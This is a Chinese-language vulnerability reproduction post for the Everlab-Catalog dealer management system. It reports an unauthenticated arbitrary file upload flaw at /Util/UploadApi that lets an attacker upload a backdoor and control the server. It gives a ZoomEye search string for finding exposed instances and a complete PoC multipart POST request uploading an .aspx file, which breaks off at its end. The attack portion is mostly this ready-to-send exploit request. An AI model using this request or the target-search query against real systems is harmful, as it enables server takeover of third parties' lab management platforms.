Everlab-Catalog经销商管理系统 文件上传复现

0x01 产品简介

Everlab 云端实验室是北京库巴扎信息科技有限公司为科研类用户量身打造的一款功能完备的信息化交流与管理平台，致力于科研数据及科研工作的规范有序。为实验室的信息化管理提供“一站式”解决方案。   

0x02 漏洞概述

Everlab-Catalog经销商管理系统 /Util/UploadApi接口处存在任意文件上传漏洞，未经授权的攻击者可上传任意后门文件，进而控制整个服务器。(EDU刷分)

0x03 复现环境

钟馗之眼：app:"Everlab Catalog"

0x04 漏洞复现

PoC

POST /Util/UploadApi HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b
Upgrade-Insecure-Requests: 1

--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: image/jpeg

<% Response.Write("Hello, World") %>
--5922960